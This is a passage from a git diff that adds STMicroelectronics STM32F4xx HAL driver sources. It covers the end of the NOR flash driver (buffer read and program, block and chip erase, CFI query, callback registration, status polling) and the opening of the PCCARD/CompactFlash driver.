NOR_MEMORY_ADRESS4; + } + + /* Update the NOR controller state */ + hnor->State = HAL_NOR_STATE_BUSY; + + /* Send read data command */ + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_FIRST), NOR_CMD_DATA_FIRST); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_SECOND), NOR_CMD_DATA_SECOND); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_THIRD), NOR_CMD_DATA_READ_RESET); + + /* Read buffer */ + while( uwBufferSize > 0U) + { + *pData++ = *(__IO uint16_t *)uwAddress; + uwAddress += 2U; + uwBufferSize--; + } + + /* Check the NOR controller state */ + hnor->State = HAL_NOR_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnor); + + return HAL_OK; +} + +/** + * @brief Writes a half-word buffer to the NOR memory. This function must be used + only with S29GL128P NOR memory. + * @param hnor pointer to the NOR handle + * @param uwAddress NOR memory internal start write address + * @param pData pointer to source data buffer. + * @param uwBufferSize Size of the buffer to write + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NOR_ProgramBuffer(NOR_HandleTypeDef *hnor, uint32_t uwAddress, uint16_t *pData, uint32_t uwBufferSize) +{ + uint16_t * p_currentaddress = (uint16_t *)NULL; + uint16_t * p_endaddress = (uint16_t *)NULL; + uint32_t lastloadedaddress = 0U, deviceaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnor); + + /* Check the NOR controller state */ + if(hnor->State == HAL_NOR_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Select the NOR device address */ + if (hnor->Init.NSBank == FMC_NORSRAM_BANK1) + { + deviceaddress = NOR_MEMORY_ADRESS1; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK2) + { + deviceaddress = NOR_MEMORY_ADRESS2; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK3) + { + deviceaddress = NOR_MEMORY_ADRESS3; + } + else /* FMC_NORSRAM_BANK4 */ + { + deviceaddress = NOR_MEMORY_ADRESS4; + } + + /* Update the NOR controller state */ + hnor->State = HAL_NOR_STATE_BUSY; + + /* Initialize variables */ + p_currentaddress = (uint16_t*)((uint32_t)(uwAddress)); + p_endaddress = p_currentaddress + (uwBufferSize-1U); + lastloadedaddress = (uint32_t)(uwAddress); + + /* Issue unlock command sequence */ + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_FIRST), NOR_CMD_DATA_FIRST); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_SECOND), NOR_CMD_DATA_SECOND); + + /* Write Buffer Load Command */ + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, uwAddress), NOR_CMD_DATA_BUFFER_AND_PROG); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, uwAddress), (uwBufferSize - 1U)); + + /* Load Data into NOR Buffer */ + while(p_currentaddress <= p_endaddress) + { + /* Store last loaded address & data value (for polling) */ + lastloadedaddress = (uint32_t)p_currentaddress; + + NOR_WRITE(p_currentaddress, *pData++); + + p_currentaddress ++; + } + + NOR_WRITE((uint32_t)(lastloadedaddress), NOR_CMD_DATA_BUFFER_AND_PROG_CONFIRM); + + /* Check the NOR controller state */ + hnor->State = HAL_NOR_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnor); + + return HAL_OK; + +} + +/** + * @brief Erase the specified block of the NOR memory + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @param BlockAddress Block to erase address + * @param Address Device address + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NOR_Erase_Block(NOR_HandleTypeDef *hnor, uint32_t BlockAddress, uint32_t Address) +{ + uint32_t deviceaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnor); + + /* Check the NOR controller state */ + if(hnor->State == HAL_NOR_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Select the NOR device address */ + if (hnor->Init.NSBank == FMC_NORSRAM_BANK1) + { + deviceaddress = NOR_MEMORY_ADRESS1; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK2) + { + deviceaddress = NOR_MEMORY_ADRESS2; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK3) + { + deviceaddress = NOR_MEMORY_ADRESS3; + } + else /* FMC_NORSRAM_BANK4 */ + { + deviceaddress = NOR_MEMORY_ADRESS4; + } + + /* Update the NOR controller state */ + hnor->State = HAL_NOR_STATE_BUSY; + + /* Send block erase command sequence */ + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_FIRST), NOR_CMD_DATA_FIRST); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_SECOND), NOR_CMD_DATA_SECOND); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_THIRD), NOR_CMD_DATA_CHIP_BLOCK_ERASE_THIRD); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_FOURTH), NOR_CMD_DATA_CHIP_BLOCK_ERASE_FOURTH); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_FIFTH), NOR_CMD_DATA_CHIP_BLOCK_ERASE_FIFTH); + NOR_WRITE((uint32_t)(BlockAddress + Address), NOR_CMD_DATA_BLOCK_ERASE); + + /* Check the NOR memory status and update the controller state */ + hnor->State = HAL_NOR_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnor); + + return HAL_OK; + +} + +/** + * @brief Erase the entire NOR chip. + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @param Address Device address + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NOR_Erase_Chip(NOR_HandleTypeDef *hnor, uint32_t Address) +{ + uint32_t deviceaddress = 0U; + + /* Prevent unused argument(s) compilation warning */ + UNUSED(Address); + + /* Process Locked */ + __HAL_LOCK(hnor); + + /* Check the NOR controller state */ + if(hnor->State == HAL_NOR_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Select the NOR device address */ + if (hnor->Init.NSBank == FMC_NORSRAM_BANK1) + { + deviceaddress = NOR_MEMORY_ADRESS1; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK2) + { + deviceaddress = NOR_MEMORY_ADRESS2; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK3) + { + deviceaddress = NOR_MEMORY_ADRESS3; + } + else /* FMC_NORSRAM_BANK4 */ + { + deviceaddress = NOR_MEMORY_ADRESS4; + } + + /* Update the NOR controller state */ + hnor->State = HAL_NOR_STATE_BUSY; + + /* Send NOR chip erase command sequence */ + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_FIRST), NOR_CMD_DATA_FIRST); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_SECOND), NOR_CMD_DATA_SECOND); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_THIRD), NOR_CMD_DATA_CHIP_BLOCK_ERASE_THIRD); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_FOURTH), NOR_CMD_DATA_CHIP_BLOCK_ERASE_FOURTH); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_FIFTH), NOR_CMD_DATA_CHIP_BLOCK_ERASE_FIFTH); + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_SIXTH), NOR_CMD_DATA_CHIP_ERASE); + + /* Check the NOR memory status and update the controller state */ + hnor->State = HAL_NOR_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnor); + + return HAL_OK; +} + +/** + * @brief Read NOR flash CFI IDs + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @param pNOR_CFI pointer to NOR CFI IDs structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NOR_Read_CFI(NOR_HandleTypeDef *hnor, NOR_CFITypeDef *pNOR_CFI) +{ + uint32_t deviceaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnor); + + /* Check the NOR controller state */ + if(hnor->State == HAL_NOR_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Select the NOR device address */ + if (hnor->Init.NSBank == FMC_NORSRAM_BANK1) + { + deviceaddress = NOR_MEMORY_ADRESS1; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK2) + { + deviceaddress = NOR_MEMORY_ADRESS2; + } + else if (hnor->Init.NSBank == FMC_NORSRAM_BANK3) + { + deviceaddress = NOR_MEMORY_ADRESS3; + } + else /* FMC_NORSRAM_BANK4 */ + { + deviceaddress = NOR_MEMORY_ADRESS4; + } + + /* Update the NOR controller state */ + hnor->State = HAL_NOR_STATE_BUSY; + + /* Send read CFI query command */ + NOR_WRITE(NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, NOR_CMD_ADDRESS_FIRST_CFI), NOR_CMD_DATA_CFI); + + /* read the NOR CFI information */ + pNOR_CFI->CFI_1 = *(__IO uint16_t *) NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, CFI1_ADDRESS); + pNOR_CFI->CFI_2 = *(__IO uint16_t *) NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, CFI2_ADDRESS); + pNOR_CFI->CFI_3 = *(__IO uint16_t *) NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, CFI3_ADDRESS); + pNOR_CFI->CFI_4 = *(__IO uint16_t *) NOR_ADDR_SHIFT(deviceaddress, uwNORMemoryDataWidth, CFI4_ADDRESS); + + /* Check the NOR controller state */ + hnor->State = HAL_NOR_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnor); + + return HAL_OK; +} + +#if (USE_HAL_NOR_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User NOR Callback + * To be used instead of the weak (surcharged) predefined callback + * @param hnor : NOR handle + * @param CallbackId : ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_NOR_MSP_INIT_CB_ID NOR MspInit callback ID + * @arg @ref HAL_NOR_MSP_DEINIT_CB_ID NOR MspDeInit callback ID + * @param pCallback : pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_NOR_RegisterCallback (NOR_HandleTypeDef *hnor, HAL_NOR_CallbackIDTypeDef CallbackId, pNOR_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + HAL_NOR_StateTypeDef state; + + if(pCallback == NULL) + { + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hnor); + + state = hnor->State; + if((state == HAL_NOR_STATE_READY) || (state == HAL_NOR_STATE_RESET) || (state == HAL_NOR_STATE_PROTECTED)) + { + switch (CallbackId) + { + case HAL_NOR_MSP_INIT_CB_ID : + hnor->MspInitCallback = pCallback; + break; + case HAL_NOR_MSP_DEINIT_CB_ID : + hnor->MspDeInitCallback = pCallback; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hnor); + return status; +} + +/** + * @brief Unregister a User NOR Callback + * NOR Callback is redirected to the weak (surcharged) predefined callback + * @param hnor : NOR handle + * @param CallbackId : ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_NOR_MSP_INIT_CB_ID NOR MspInit callback ID + * @arg @ref HAL_NOR_MSP_DEINIT_CB_ID NOR MspDeInit callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_NOR_UnRegisterCallback (NOR_HandleTypeDef *hnor, HAL_NOR_CallbackIDTypeDef CallbackId) +{ + HAL_StatusTypeDef status = HAL_OK; + HAL_NOR_StateTypeDef state; + + /* Process locked */ + __HAL_LOCK(hnor); + + state = hnor->State; + if((state == HAL_NOR_STATE_READY) || (state == HAL_NOR_STATE_RESET) || (state == HAL_NOR_STATE_PROTECTED)) + { + switch (CallbackId) + { + case HAL_NOR_MSP_INIT_CB_ID : + hnor->MspInitCallback = HAL_NOR_MspInit; + break; + case HAL_NOR_MSP_DEINIT_CB_ID : + hnor->MspDeInitCallback = HAL_NOR_MspDeInit; + break; + default : + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hnor); + return status; +} +#endif /* (USE_HAL_NOR_REGISTER_CALLBACKS) */ +/** + * @} + */ + +/** @defgroup NOR_Exported_Functions_Group3 NOR Control functions + * @brief management functions + * +@verbatim + ============================================================================== + ##### NOR Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control dynamically + the NOR interface. + +@endverbatim + * @{ + */ + +/** + * @brief Enables dynamically NOR write operation. + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NOR_WriteOperation_Enable(NOR_HandleTypeDef *hnor) +{ + /* Process Locked */ + __HAL_LOCK(hnor); + + /* Enable write operation */ + FMC_NORSRAM_WriteOperation_Enable(hnor->Instance, hnor->Init.NSBank); + + /* Update the NOR controller state */ + hnor->State = HAL_NOR_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnor); + + return HAL_OK; +} + +/** + * @brief Disables dynamically NOR write operation. + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NOR_WriteOperation_Disable(NOR_HandleTypeDef *hnor) +{ + /* Process Locked */ + __HAL_LOCK(hnor); + + /* Update the SRAM controller state */ + hnor->State = HAL_NOR_STATE_BUSY; + + /* Disable write operation */ + FMC_NORSRAM_WriteOperation_Disable(hnor->Instance, hnor->Init.NSBank); + + /* Update the NOR controller state */ + hnor->State = HAL_NOR_STATE_PROTECTED; + + /* Process unlocked */ + __HAL_UNLOCK(hnor); + + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup NOR_Exported_Functions_Group4 NOR State functions + * @brief Peripheral State functions + * +@verbatim + ============================================================================== + ##### NOR State functions ##### + ============================================================================== + [..] + This subsection permits to get in run-time the status of the NOR controller + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief return the NOR controller state + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @retval NOR controller state + */ +HAL_NOR_StateTypeDef HAL_NOR_GetState(NOR_HandleTypeDef *hnor) +{ + return hnor->State; +} + +/** + * @brief Returns the NOR operation status. + * @param hnor pointer to a NOR_HandleTypeDef structure that contains + * the configuration information for NOR module. + * @param Address Device address + * @param Timeout NOR programming Timeout + * @retval NOR_Status: The returned value can be: HAL_NOR_STATUS_SUCCESS, HAL_NOR_STATUS_ERROR + * or HAL_NOR_STATUS_TIMEOUT + */ +HAL_NOR_StatusTypeDef HAL_NOR_GetStatus(NOR_HandleTypeDef *hnor, uint32_t Address, uint32_t Timeout) +{ + HAL_NOR_StatusTypeDef status = HAL_NOR_STATUS_ONGOING; + uint16_t tmpSR1 = 0, tmpSR2 = 0; + uint32_t tickstart = 0U; + + /* Poll on NOR memory Ready/Busy signal ------------------------------------*/ + HAL_NOR_MspWait(hnor, Timeout); + + /* Get the NOR memory operation status -------------------------------------*/ + + /* Get tick */ + tickstart = HAL_GetTick(); + while((status != HAL_NOR_STATUS_SUCCESS ) && (status != HAL_NOR_STATUS_TIMEOUT)) + { + /* Check for the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + status = HAL_NOR_STATUS_TIMEOUT; + } + } + + /* Read NOR status register (DQ6 and DQ5) */ + tmpSR1 = *(__IO uint16_t *)Address; + tmpSR2 = *(__IO uint16_t *)Address; + + /* If DQ6 did not toggle between the two reads then return HAL_NOR_STATUS_SUCCESS */ + if((tmpSR1 & NOR_MASK_STATUS_DQ6) == (tmpSR2 & NOR_MASK_STATUS_DQ6)) + { + return HAL_NOR_STATUS_SUCCESS ; + } + + if((tmpSR1 & NOR_MASK_STATUS_DQ5) == NOR_MASK_STATUS_DQ5) + { + status = HAL_NOR_STATUS_ONGOING; + } + + tmpSR1 = *(__IO uint16_t *)Address; + tmpSR2 = *(__IO uint16_t *)Address; + + /* If DQ6 did not toggle between the two reads then return HAL_NOR_STATUS_SUCCESS */ + if((tmpSR1 & NOR_MASK_STATUS_DQ6) == (tmpSR2 & NOR_MASK_STATUS_DQ6)) + { + return HAL_NOR_STATUS_SUCCESS; + } + if((tmpSR1 & NOR_MASK_STATUS_DQ5) == NOR_MASK_STATUS_DQ5) + { + return HAL_NOR_STATUS_ERROR; + } + } + + /* Return the operation status */ + return status; +} + +/** + * @} + */ + +/** + * @} + */ +#endif /* STM32F405xx || STM32F415xx || STM32F407xx || STM32F417xx || STM32F427xx ||\ + STM32F437xx || STM32F429xx || STM32F439xx || STM32F446xx || STM32F469xx ||\ + STM32F479xx || STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F413xx ||\ + STM32F423xx */ +#endif /* HAL_NOR_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pccard.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pccard.c new file mode 100644 index 000000000..2f7d3e0ff --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pccard.c @@ -0,0 +1,942 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_pccard.c + * @author MCD Application Team + * @brief PCCARD HAL module driver. + * This file provides a generic firmware to drive PCCARD memories mounted + * as external device. + * + @verbatim + =============================================================================== + ##### How to use this driver ##### + =============================================================================== + [..] + This driver is a generic layered driver which contains a set of APIs used to + control PCCARD/compact flash memories. It uses the FMC/FSMC layer functions + to interface with PCCARD devices. This driver is used for: + + (+) PCCARD/Compact Flash memory configuration sequence using the function + HAL_PCCARD_Init()/HAL_CF_Init() with control and timing parameters for + both common and attribute spaces. + + (+) Read PCCARD/Compact Flash memory maker and device IDs using the function + HAL_PCCARD_Read_ID()/HAL_CF_Read_ID(). The read information is stored in + the CompactFlash_ID structure declared by the function caller. + + (+) Access PCCARD/Compact Flash memory by read/write operations using the functions + HAL_PCCARD_Read_Sector()/ HAL_PCCARD_Write_Sector() - + HAL_CF_Read_Sector()/HAL_CF_Write_Sector(), to read/write sector. + + (+) Perform PCCARD/Compact Flash Reset chip operation using the function + HAL_PCCARD_Reset()/HAL_CF_Reset. + + (+) Perform PCCARD/Compact Flash erase sector operation using the function + HAL_PCCARD_Erase_Sector()/HAL_CF_Erase_Sector. + + (+) Read the PCCARD/Compact Flash status operation using the function + HAL_PCCARD_ReadStatus()/HAL_CF_ReadStatus(). + + (+) You can monitor the PCCARD/Compact Flash device HAL state by calling + the function HAL_PCCARD_GetState()/HAL_CF_GetState() + + [..] + (@) This driver is a set of generic APIs which handle standard PCCARD/compact flash + operations. If a PCCARD/Compact Flash device contains different operations + and/or implementations, it should be implemented separately. + + *** Callback registration *** + ============================================= + [..] + The compilation define USE_HAL_PCCARD_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + Use Functions @ref HAL_PCCARD_RegisterCallback() to register a user callback, + it allows to register following callbacks: + (+) MspInitCallback : PCCARD MspInit. + (+) MspDeInitCallback : PCCARD MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + Use function @ref HAL_PCCARD_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. It allows to reset following callbacks: + (+) MspInitCallback : PCCARD MspInit. + (+) MspDeInitCallback : PCCARD MspDeInit. + This function) takes as parameters the HAL peripheral handle and the Callback ID. + + By default, after the @ref HAL_PCCARD_Init and if the state is HAL_PCCARD_STATE_RESET + all callbacks are reset to the corresponding legacy weak (surcharged) functions. + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak (surcharged) functions in the @ref HAL_PCCARD_Init + and @ref HAL_PCCARD_DeInit only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the @ref HAL_PCCARD_Init and @ref HAL_PCCARD_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) + + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using @ref HAL_PCCARD_RegisterCallback before calling @ref HAL_PCCARD_DeInit + or @ref HAL_PCCARD_Init function. + + When The compilation define USE_HAL_PCCARD_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +#ifdef HAL_PCCARD_MODULE_ENABLED +#if defined(STM32F405xx) || defined(STM32F415xx) || defined(STM32F407xx) || defined(STM32F417xx) ||\ + defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) +/** @defgroup PCCARD PCCARD + * @brief PCCARD HAL module driver + * @{ + */ +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ + +/** @defgroup PCCARD_Private_Defines PCCARD Private Defines + * @{ + */ +#define PCCARD_TIMEOUT_READ_ID 0x0000FFFFU +#define PCCARD_TIMEOUT_READ_WRITE_SECTOR 0x0000FFFFU +#define PCCARD_TIMEOUT_ERASE_SECTOR 0x00000400U +#define PCCARD_TIMEOUT_STATUS 0x01000000U + +#define PCCARD_STATUS_OK (uint8_t)0x58 +#define PCCARD_STATUS_WRITE_OK (uint8_t)0x50 +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function ----------------------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ +/** @defgroup PCCARD_Exported_Functions PCCARD Exported Functions + * @{ + */ + +/** @defgroup PCCARD_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * + @verbatim + ============================================================================== + ##### PCCARD Initialization and de-initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to initialize/de-initialize + the PCCARD memory + +@endverbatim + * @{ + */ + +/** + * @brief Perform the PCCARD memory Initialization sequence + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @param ComSpaceTiming Common space timing structure + * @param AttSpaceTiming Attribute space timing structure + * @param IOSpaceTiming IO space timing structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCCARD_Init(PCCARD_HandleTypeDef *hpccard, FMC_NAND_PCC_TimingTypeDef *ComSpaceTiming, FMC_NAND_PCC_TimingTypeDef *AttSpaceTiming, FMC_NAND_PCC_TimingTypeDef *IOSpaceTiming) +{ + /* Check the PCCARD controller state */ + if(hpccard == NULL) + { + return HAL_ERROR; + } + + if(hpccard->State == HAL_PCCARD_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hpccard->Lock = HAL_UNLOCKED; +#if (USE_HAL_PCCARD_REGISTER_CALLBACKS == 1) + if(hpccard->MspInitCallback == NULL) + { + hpccard->MspInitCallback = HAL_PCCARD_MspInit; + } + hpccard->ItCallback = HAL_PCCARD_ITCallback; + + /* Init the low level hardware */ + hpccard->MspInitCallback(hpccard); +#else + /* Initialize the low level hardware (MSP) */ + HAL_PCCARD_MspInit(hpccard); +#endif + } + + /* Initialize the PCCARD state */ + hpccard->State = HAL_PCCARD_STATE_BUSY; + + /* Initialize PCCARD control Interface */ + FMC_PCCARD_Init(hpccard->Instance, &(hpccard->Init)); + + /* Init PCCARD common space timing Interface */ + FMC_PCCARD_CommonSpace_Timing_Init(hpccard->Instance, ComSpaceTiming); + + /* Init PCCARD attribute space timing Interface */ + FMC_PCCARD_AttributeSpace_Timing_Init(hpccard->Instance, AttSpaceTiming); + + /* Init PCCARD IO space timing Interface */ + FMC_PCCARD_IOSpace_Timing_Init(hpccard->Instance, IOSpaceTiming); + + /* Enable the PCCARD device */ + __FMC_PCCARD_ENABLE(hpccard->Instance); + + /* Update the PCCARD state */ + hpccard->State = HAL_PCCARD_STATE_READY; + + return HAL_OK; + +} + +/** + * @brief Perform the PCCARD memory De-initialization sequence + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCCARD_DeInit(PCCARD_HandleTypeDef *hpccard) +{ +#if (USE_HAL_PCCARD_REGISTER_CALLBACKS == 1) + if(hpccard->MspDeInitCallback == NULL) + { + hpccard->MspDeInitCallback = HAL_PCCARD_MspDeInit; + } + + /* DeInit the low level hardware */ + hpccard->MspDeInitCallback(hpccard); +#else + /* De-Initialize the low level hardware (MSP) */ + HAL_PCCARD_MspDeInit(hpccard); +#endif + + /* Configure the PCCARD registers with their reset values */ + FMC_PCCARD_DeInit(hpccard->Instance); + + /* Update the PCCARD controller state */ + hpccard->State = HAL_PCCARD_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hpccard); + + return HAL_OK; +} + +/** + * @brief PCCARD MSP Init + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @retval None + */ +__weak void HAL_PCCARD_MspInit(PCCARD_HandleTypeDef *hpccard) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpccard); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_PCCARD_MspInit could be implemented in the user file + */ +} + +/** + * @brief PCCARD MSP DeInit + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @retval None + */ +__weak void HAL_PCCARD_MspDeInit(PCCARD_HandleTypeDef *hpccard) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpccard); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_PCCARD_MspDeInit could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup PCCARD_Exported_Functions_Group2 Input and Output functions + * @brief Input Output and memory control functions + * + @verbatim + ============================================================================== + ##### PCCARD Input and Output functions ##### + ============================================================================== + [..] + This section provides functions allowing to use and control the PCCARD memory + +@endverbatim + * @{ + */ + +/** + * @brief Read Compact Flash's ID. + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @param CompactFlash_ID Compact flash ID structure. + * @param pStatus pointer to compact flash status + * @retval HAL status + * + */ +HAL_StatusTypeDef HAL_PCCARD_Read_ID(PCCARD_HandleTypeDef *hpccard, uint8_t CompactFlash_ID[], uint8_t *pStatus) +{ + uint32_t timeout = PCCARD_TIMEOUT_READ_ID, index = 0U; + uint8_t status = 0; + + /* Process Locked */ + __HAL_LOCK(hpccard); + + /* Check the PCCARD controller state */ + if(hpccard->State == HAL_PCCARD_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Update the PCCARD controller state */ + hpccard->State = HAL_PCCARD_STATE_BUSY; + + /* Initialize the PCCARD status */ + *pStatus = PCCARD_READY; + + /* Send the Identify Command */ + *(__IO uint16_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD) = 0xECEC; + + /* Read PCCARD IDs and timeout treatment */ + do + { + /* Read the PCCARD status */ + status = *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_STATUS_CMD_ALTERNATE); + + timeout--; + }while((status != PCCARD_STATUS_OK) && timeout); + + if(timeout == 0U) + { + *pStatus = PCCARD_TIMEOUT_ERROR; + } + else + { + /* Read PCCARD ID bytes */ + for(index = 0U; index < 16U; index++) + { + CompactFlash_ID[index] = *(__IO uint8_t *)(PCCARD_IO_SPACE_PRIMARY_ADDR | ATA_DATA); + } + } + + /* Update the PCCARD controller state */ + hpccard->State = HAL_PCCARD_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hpccard); + + return HAL_OK; +} + +/** + * @brief Read sector from PCCARD memory + * @param hpccard pointer to a PCCARD_HandleTypeDef structure that contains + * the configuration information for PCCARD module. + * @param pBuffer pointer to destination read buffer + * @param SectorAddress Sector address to read + * @param pStatus pointer to PCCARD status + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCCARD_Read_Sector(PCCARD_HandleTypeDef *hpccard, uint16_t *pBuffer, uint16_t SectorAddress, uint8_t *pStatus) +{ + uint32_t timeout = PCCARD_TIMEOUT_READ_WRITE_SECTOR, index = 0U; + uint8_t status = 0; + + /* Process Locked */ + 